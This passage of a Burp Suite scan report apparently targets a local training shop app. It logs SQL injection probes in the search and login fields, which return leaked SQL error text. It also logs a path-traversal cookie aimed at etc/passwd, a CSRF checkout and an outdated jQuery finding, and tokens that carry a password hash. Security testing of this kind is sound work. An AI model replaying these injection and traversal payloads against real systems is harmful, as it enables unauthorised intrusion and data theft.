Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 12

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:31 GMT
Connection: close

{"status":"success","data":[]}

Request 13

GET /rest/product/search?q=orangel6qpg3'||min(sqlite_versipn(),1)||'&qny0z95w=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 13

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:43 GMT
Connection: close
Content-Length: 426

{
"error": {
"message": "SQLITE_ERROR: no such function: sqlite_versipn",
"stack": "Error: SQLITE_ERROR: no such function: sqlite_versipn\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangel6qpg3'||min(sqlite_versipn(),1)||'%' OR description LIKE '%orangel6qpg3'||min(sqlite_versipn(),1)||'%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 14

GET /rest/product/search?q=orangevzckt5'||min(sqlite_version(),1)||'&yzzel4o4=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 14

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:40 GMT
Connection: close

{"status":"success","data":[]}

4.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.61.143:3000
Path:   /rest/user/login

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order.

Successful probes

Request 1

POST /rest/user/login?m4oquvvj=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 86
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comrba922\\z`z'z\"\\","password":"juice-shop-password"}

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:24 GMT
Connection: close
Content-Length: 347

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comrba922\\z`z'z\"\\' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 2

POST /rest/user/login?zsdnu6ig=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 90
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.compr5x84\\`z''z\\\"\\\\","password":"juice-shop-password"}

Response 2

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:21 GMT
Connection: close

Invalid email or password.

Request 3

POST /rest/user/login?sp1bvq4o=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 81
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comrp5hq1\\zz'z","password":"juice-shop-password"}

Response 3

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:27 GMT
Connection: close
Content-Length: 342

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comrp5hq1\\zz'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 4

POST /rest/user/login?ypfobdso=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 81
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comreohb4z\\''z","password":"juice-shop-password"}

Response 4

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:25 GMT
Connection: close

Invalid email or password.

Request 5

POST /rest/user/login?lrjfrdut=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 84
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comitah06z||'z(z'z","password":"juice-shop-password"}

Response 5

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:31 GMT
Connection: close
Content-Length: 345

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comitah06z||'z(z'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 6

POST /rest/user/login?ts0qsf7m=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 83
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comg7vrm0z(z'||'z","password":"juice-shop-password"}

Response 6

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:28 GMT
Connection: close

Invalid email or password.

Request 7

POST /rest/user/login?w71yz59s=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 83
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.commpmlr6z+'z(z'z","password":"juice-shop-password"}

Response 7

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:34 GMT
Connection: close
Content-Length: 344

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.commpmlr6z+'z(z'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 8

POST /rest/user/login?posnsh60=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 82
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comvewgd3z(z'+'z","password":"juice-shop-password"}

Response 8

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:31 GMT
Connection: close

Invalid email or password.

Request 9

POST /rest/user/login?mwbhzvj5=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 83
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comw9mze4z&'z(z'z","password":"juice-shop-password"}

Response 9

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:37 GMT
Connection: close
Content-Length: 344

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comw9mze4z&'z(z'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 10

POST /rest/user/login?z8sgwfry=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 82
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comocg696z(z'&'z","password":"juice-shop-password"}

Response 10

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:35 GMT
Connection: close

Invalid email or password.

Request 11

POST /rest/user/login?gkxs8dp7=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 87
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comw1y9d6'||abf(1)||'","password":"juice-shop-password"}

Response 11

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:49 GMT
Connection: close
Content-Length: 342

{
"error": {
"message": "SQLITE_ERROR: no such function: abf",
"stack": "Error: SQLITE_ERROR: no such function: abf\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comw1y9d6'||abf(1)||'' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 12

POST /rest/user/login?p9tgm7iy=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 87
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.commjaqd2'||abs(1)||'","password":"juice-shop-password"}

Response 12

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:44 GMT
Connection: close

Invalid email or password.

Request 13

POST /rest/user/login?y0mmkz6p=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 104
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comlzl684'||min(sqlite_versipn(),1)||'","password":"juice-shop-password"}

Response 13

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:15:00 GMT
Connection: close
Content-Length: 381

{
"error": {
"message": "SQLITE_ERROR: no such function: sqlite_versipn",
"stack": "Error: SQLITE_ERROR: no such function: sqlite_versipn\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comlzl684'||min(sqlite_versipn(),1)||'' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 14

POST /rest/user/login?xmctlma3=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 104
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.comjw7mn3'||min(sqlite_version(),1)||'","password":"juice-shop-password"}

Response 14

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:57 GMT
Connection: close

Invalid email or password.

5. Local File Include

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/jquery/dist/jquery.min.js

Note: This issue was generated by the Burp extension: J2EEScan.

Issue detail

J2EEscan identified a local file include vulnerability. It was possible to retrieve configuration files from the remote system.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Request 1

GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2fetc%2fpasswd
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
ETag: W/"1499c-14d00c472c0"
Content-Type: application/javascript
Content-Length: 84380
Date: Sun, 15 Jan 2017 21:12:15 GMT
Connection: close

/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
...[SNIP]...

6. Cross-site request forgery

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://192.168.61.143:3000
Path:   /rest/basket/4/checkout

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.

Issue background

Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

References

Request 1

POST /rest/basket/4/checkout HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close
Content-Length: 0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 47
ETag: W/"2f-NgEW6rFAE2GfaaE8xDEnKg"
Date: Sun, 15 Jan 2017 21:13:34 GMT
Connection: close

/ftp/order_cc735db3cd7c84a3097fae316e24b361.pdf

Request 2

POST /rest/basket/4/checkout HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://xfyFIQkBbX.com:3000/
Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg; email=mike_landeck%40hotmail.com
DNT: 1
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded

Response 2

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 47
ETag: W/"2f-ZhtivIomvV4AP6tTvbcmVg"
Date: Sun, 15 Jan 2017 21:45:36 GMT
Connection: close

/ftp/order_aa1708b461081ba18b8f851dd10a5ec4.pdf

7. The JavaScript file 'jquery.min.js' includes a vulnerable version of the library 'jquery'

Summary

Severity:   Medium
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/jquery/dist/jquery.min.js

Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 2.1.4 has known security issues.
For more information, visit those websites:

  • https://github.com/jquery/jquery/issues/2432
  • http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/

Affected versions

The vulnerability affects all versions prior to 3.0.0-beta1 (between 1.12.3 and 3.0.0-beta1).

Other considerations

The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

